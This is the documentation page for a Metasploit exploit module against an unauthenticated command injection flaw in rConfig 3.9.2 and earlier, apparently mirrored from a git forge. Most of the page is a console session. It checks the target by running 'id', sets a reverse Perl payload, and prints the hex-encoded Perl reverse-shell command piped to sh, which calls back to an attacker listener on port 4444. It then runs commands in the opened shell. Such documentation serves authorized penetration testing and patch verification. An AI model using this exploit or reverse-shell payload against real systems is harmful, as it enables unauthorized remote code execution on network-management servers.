adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
9beec65ef34c4e90a00a41ee1c8de0f9e6effd2a
metasploit-gs/documentation/modules/exploit/unix/webapp/rconfig_install_cmd_exec.md
T
Brendan Coles 08d51acd18 Update targets
2019-11-01 20:33:23 +00:00

3.4 KiB
Raw Blame History

Description

This module exploits an unauthenticated command injection vulnerability in rConfig versions 3.9.2 and prior. The install directory is not automatically removed after installation, allowing unauthenticated users to execute arbitrary commands via the ajaxServerSettingsChk.php file as the web server user.

Vulnerable Software

This module has been tested successfully on rConfig version 3.9.2 on CentOS 7.7.1908 (x64).

Verification Steps

  1. Start msfconsole
  2. Do: use exploit/unix/webapp/rconfig_install_cmd_exec
  3. Do: set rhosts <IP>
  4. Do: run
  5. You should get a new session

Options

TARGETURI

The base path to rConfig install directory (default: /install/)

Scenarios

msf5 > use exploit/unix/webapp/rconfig_install_cmd_exec 
msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > set rhosts 172.16.191.131
rhosts => 172.16.191.131
msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > set verbose true
verbose => true
msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > check

[*] Executing command: id
[*] Response: uid=48(apache) gid=48(apache) groups=48(apache)
[+] 172.16.191.131:443 - The target is vulnerable.
msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic (Unix In-Memory)
   1   Automatic (Linux Dropper)


msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > set target 0
target => 0
msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > set lhost 172.16.191.165 
lhost => 172.16.191.165
msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] Executing command: id
[*] Response: uid=48(apache) gid=48(apache) groups=48(apache)
[*] Executing command: /bin/echo -ne '\x70\x65\x72\x6c\x20\x2d\x4d\x49\x4f\x20\x2d\x65\x20\x27\x24\x70\x3d\x66\x6f\x72\x6b\x3b\x65\x78\x69\x74\x2c\x69\x66\x28\x24\x70\x29\x3b\x66\x6f\x72\x65\x61\x63\x68\x20\x6d\x79\x20\x24\x6b\x65\x79\x28\x6b\x65\x79\x73\x20\x25\x45\x4e\x56\x29\x7b\x69\x66\x28\x24\x45\x4e\x56\x7b\x24\x6b\x65\x79\x7d\x3d\x7e\x2f\x28\x2e\x2a\x29\x2f\x29\x7b\x24\x45\x4e\x56\x7b\x24\x6b\x65\x79\x7d\x3d\x24\x31\x3b\x7d\x7d\x24\x63\x3d\x6e\x65\x77\x20\x49\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3a\x3a\x49\x4e\x45\x54\x28\x50\x65\x65\x72\x41\x64\x64\x72\x2c\x22\x31\x37\x32\x2e\x31\x36\x2e\x31\x39\x31\x2e\x31\x36\x35\x3a\x34\x34\x34\x34\x22\x29\x3b\x53\x54\x44\x49\x4e\x2d\x3e\x66\x64\x6f\x70\x65\x6e\x28\x24\x63\x2c\x72\x29\x3b\x24\x7e\x2d\x3e\x66\x64\x6f\x70\x65\x6e\x28\x24\x63\x2c\x77\x29\x3b\x77\x68\x69\x6c\x65\x28\x3c\x3e\x29\x7b\x69\x66\x28\x24\x5f\x3d\x7e\x20\x2f\x28\x2e\x2a\x29\x2f\x29\x7b\x73\x79\x73\x74\x65\x6d\x20\x24\x31\x3b\x7d\x7d\x3b\x27'|sh
[*] Command shell session 1 opened (172.16.191.165:4444 -> 172.16.191.131:35004) at 2019-10-29 11:48:59 -0400

id
uid=48(apache) gid=48(apache) groups=48(apache)
uname -a
Linux localhost.localdomain 3.10.0-1062.4.1.el7.x86_64 #1 SMP Fri Oct 18 17:15:30 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
pwd
/home/rconfig/www/install/lib/ajaxHandlers
^C
Abort session 1? [y/N]  y
""

[*] 172.16.191.131 - Command shell session 1 closed.  Reason: User exit
msf5 exploit(unix/webapp/rconfig_install_cmd_exec) >
Reference in New Issue View Git Blame Copy Permalink